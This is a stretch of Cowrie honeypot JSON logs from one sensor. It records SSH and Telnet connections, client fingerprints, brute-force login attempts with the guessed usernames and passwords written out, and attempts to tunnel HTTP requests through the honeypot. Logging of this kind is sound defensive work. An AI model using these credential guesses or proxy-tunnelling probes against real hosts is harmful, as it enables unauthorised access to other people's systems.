a2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.488526Z","src_ip":"77.83.207.83","session":"ab8aab84bbe4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.737854Z","src_ip":"77.83.207.83","session":"ab8aab84bbe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19043,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19043","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.788770Z","session":"ab8aab84bbe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.838842Z","src_ip":"77.83.207.83","session":"ab8aab84bbe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22421,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22421","sensor":"my-vps","timestamp":"2025-08-31T03:54:33.980352Z","session":"ab8aab84bbe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:34.030486Z","src_ip":"77.83.207.83","session":"ab8aab84bbe4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":14605,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:14605","sensor":"my-vps","timestamp":"2025-08-31T03:54:34.172543Z","session":"ab8aab84bbe4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:34.222609Z","src_ip":"77.83.207.83","session":"ab8aab84bbe4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:34.273904Z","src_ip":"77.83.207.83","session":"ab8aab84bbe4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:54:36.066146Z","src_ip":"212.227.125.160","session":"5a335e5795bd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54570,"dst_ip":"1.2.3.4","dst_port":22,"session":"b64191b767ca","protocol":"ssh","message":"New connection: 212.227.125.160:54570 (1.2.3.4:22) [session: b64191b767ca]","sensor":"my-vps","timestamp":"2025-08-31T03:54:39.784055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:54:39.794858Z","src_ip":"212.227.125.160","session":"b64191b767ca"}
{"eventid":"cowrie.client.kex","hassh":"873a5fb5fedc2d4f8638ebde4abc6cfc","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 873a5fb5fedc2d4f8638ebde4abc6cfc","sensor":"my-vps","timestamp":"2025-08-31T03:54:39.908789Z","src_ip":"212.227.125.160","session":"b64191b767ca"}
{"eventid":"cowrie.session.closed","duration":12.773638725280762,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:41.984133Z","src_ip":"212.227.235.229","session":"7f9507c19dfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45911,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6d5d3874104","protocol":"telnet","message":"New connection: 212.227.235.229:45911 (1.2.3.4:23) [session: b6d5d3874104]","sensor":"my-vps","timestamp":"2025-08-31T03:54:42.199047Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59372,"dst_ip":"1.2.3.4","dst_port":22,"session":"71e9fa554ffd","protocol":"ssh","message":"New connection: 212.227.235.229:59372 (1.2.3.4:22) [session: 71e9fa554ffd]","sensor":"my-vps","timestamp":"2025-08-31T03:54:42.450075Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:54:43.494116Z","src_ip":"212.227.235.229","session":"71e9fa554ffd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:54:43.495326Z","src_ip":"212.227.235.229","session":"71e9fa554ffd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:44.298105Z","src_ip":"212.227.125.160","session":"5eaa601b498c"}
{"eventid":"cowrie.session.closed","duration":180.53493571281433,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:44.301581Z","src_ip":"212.227.125.160","session":"5eaa601b498c"}
{"eventid":"cowrie.session.closed","duration":12.581573009490967,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:45.592538Z","src_ip":"182.119.206.115","session":"85053ac9f018"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":50850,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2b23bde81ae","protocol":"telnet","message":"New connection: 182.119.206.115:50850 (1.2.3.4:23) [session: b2b23bde81ae]","sensor":"my-vps","timestamp":"2025-08-31T03:54:45.755993Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:54:47.917384Z","src_ip":"212.227.125.160","session":"5a335e5795bd"}
{"eventid":"cowrie.login.failed","username":"master","password":"admin123","message":"login attempt [master/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:54:48.930409Z","src_ip":"212.227.235.229","session":"71e9fa554ffd"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:50.737729Z","src_ip":"212.227.235.229","session":"71e9fa554ffd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34846,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5a7be02a859","protocol":"ssh","message":"New connection: 212.227.235.229:34846 (1.2.3.4:22) [session: e5a7be02a859]","sensor":"my-vps","timestamp":"2025-08-31T03:54:54.219028Z"}
{"eventid":"cowrie.session.closed","duration":"15.2","message":"Connection lost after 15.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:54.947210Z","src_ip":"212.227.125.160","session":"b64191b767ca"}
{"eventid":"cowrie.session.closed","duration":12.749639511108398,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:54.948581Z","src_ip":"212.227.235.229","session":"b6d5d3874104"}
{"eventid":"cowrie.session.closed","duration":12.84921407699585,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:58.605137Z","src_ip":"182.119.206.115","session":"b2b23bde81ae"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":51160,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccdd6a1cbe44","protocol":"telnet","message":"New connection: 182.119.206.115:51160 (1.2.3.4:23) [session: ccdd6a1cbe44]","sensor":"my-vps","timestamp":"2025-08-31T03:54:58.766475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:54:59.933582Z","src_ip":"212.227.235.229","session":"e5a7be02a859"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:54:59.934383Z","src_ip":"212.227.235.229","session":"e5a7be02a859"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49500,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df03ea1bc1d","protocol":"ssh","message":"New connection: 212.227.125.160:49500 (1.2.3.4:22) [session: 0df03ea1bc1d]","sensor":"my-vps","timestamp":"2025-08-31T03:55:04.211936Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:55:04.236599Z","src_ip":"212.227.125.160","session":"5a335e5795bd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:55:04.641341Z","src_ip":"212.227.125.160","session":"0df03ea1bc1d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:55:04.642038Z","src_ip":"212.227.125.160","session":"0df03ea1bc1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60976,"dst_ip":"1.2.3.4","dst_port":22,"session":"48cc93279f9e","protocol":"ssh","message":"New connection: 212.227.235.229:60976 (1.2.3.4:22) [session: 48cc93279f9e]","sensor":"my-vps","timestamp":"2025-08-31T03:55:06.660217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:55:06.660906Z","src_ip":"212.227.235.229","session":"48cc93279f9e"}
{"eventid":"cowrie.login.failed","username":"master","password":"admin123","message":"login attempt [master/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:06.682012Z","src_ip":"212.227.125.160","session":"0df03ea1bc1d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:55:06.982446Z","src_ip":"212.227.235.229","session":"48cc93279f9e"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:08.216576Z","src_ip":"212.227.125.160","session":"0df03ea1bc1d"}
{"eventid":"cowrie.login.failed","username":"sshvpn","password":"123qwe","message":"login attempt [sshvpn/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:08.324155Z","src_ip":"212.227.235.229","session":"48cc93279f9e"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:09.649625Z","src_ip":"212.227.235.229","session":"48cc93279f9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58083,"dst_ip":"1.2.3.4","dst_port":23,"session":"70fd40c07e55","protocol":"telnet","message":"New connection: 212.227.125.160:58083 (1.2.3.4:23) [session: 70fd40c07e55]","sensor":"my-vps","timestamp":"2025-08-31T03:55:10.336588Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58120,"dst_ip":"1.2.3.4","dst_port":23,"session":"d369489dac35","protocol":"telnet","message":"New connection: 212.227.125.160:58120 (1.2.3.4:23) [session: d369489dac35]","sensor":"my-vps","timestamp":"2025-08-31T03:55:11.198573Z"}
{"eventid":"cowrie.session.closed","duration":12.816351413726807,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:11.582739Z","src_ip":"182.119.206.115","session":"ccdd6a1cbe44"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.206.115","src_port":51456,"dst_ip":"1.2.3.4","dst_port":23,"session":"0da540937a49","protocol":"telnet","message":"New connection: 182.119.206.115:51456 (1.2.3.4:23) [session: 0da540937a49]","sensor":"my-vps","timestamp":"2025-08-31T03:55:11.805215Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58155,"dst_ip":"1.2.3.4","dst_port":23,"session":"bebda4cac887","protocol":"telnet","message":"New connection: 212.227.125.160:58155 (1.2.3.4:23) [session: bebda4cac887]","sensor":"my-vps","timestamp":"2025-08-31T03:55:13.209489Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":65383,"dst_ip":"1.2.3.4","dst_port":22,"session":"d072d557f5f9","protocol":"ssh","message":"New connection: 80.94.95.15:65383 (1.2.3.4:22) [session: d072d557f5f9]","sensor":"my-vps","timestamp":"2025-08-31T03:55:15.231948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:55:15.232949Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:55:15.283792Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
{"eventid":"cowrie.login.failed","username":"yue","password":"yue","message":"login attempt [yue/yue] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:15.576165Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abc123","message":"login attempt [yue/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:16.630051Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52056,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e770e9b9b23","protocol":"ssh","message":"New connection: 212.227.125.160:52056 (1.2.3.4:22) [session: 7e770e9b9b23]","sensor":"my-vps","timestamp":"2025-08-31T03:55:16.683923Z"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abcd123","message":"login attempt [yue/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:17.682797Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abcd1234","message":"login attempt [yue/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:18.736479Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
{"eventid":"cowrie.login.failed","username":"yue","password":"abc1234","message":"login attempt [yue/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:55:19.789468Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:55:20.842309Z","src_ip":"80.94.95.15","session":"d072d557f5f9"}
